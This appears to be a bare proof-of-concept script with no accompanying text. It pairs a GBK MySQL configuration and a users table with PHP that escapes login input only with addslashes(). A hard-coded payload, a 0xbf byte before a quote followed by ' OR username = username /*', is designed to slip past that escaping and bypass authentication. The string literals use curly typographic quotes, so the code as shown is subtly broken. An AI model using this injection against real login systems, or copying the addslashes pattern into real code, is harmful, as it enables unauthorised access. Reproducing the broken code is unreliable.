[client]default-character-set=GBK

CREATE TABLE users(username VARCHAR(32) CHARACTER SET GBK,password VARCHAR(32) CHARACTER SET GBK,PRIMARY KEY (username));

<?php 
 
$mysql = array(); 
 
$db = mysqli_init(); 
$db->real_connect(‘localhost‘, ‘myuser‘, ‘mypass‘, ‘mydb‘); 
 
$_POST[‘username‘] = chr(0xbf) . 
                     chr(0x27) . 
                     ‘ OR username = username /*‘; 
$_POST[‘password‘] = ‘guess‘; 
 
$mysql[‘username‘] = addslashes($_POST[‘username‘]); 
$mysql[‘password‘] = addslashes($_POST[‘password‘]); 
 
$sql = "SELECT * 
        FROM   users 
        WHERE  username = ‘{$mysql[‘username‘]}‘ 
        AND    password = ‘{$mysql[‘password‘]}‘"; 
 
$result = $db->query($sql); 
 
if ($result->num_rows) 
{ 
    echo ‘<p>Success</p>‘; 
} 
else 
{ 
    echo ‘<p>Failure</p>‘; 
} 
 
?>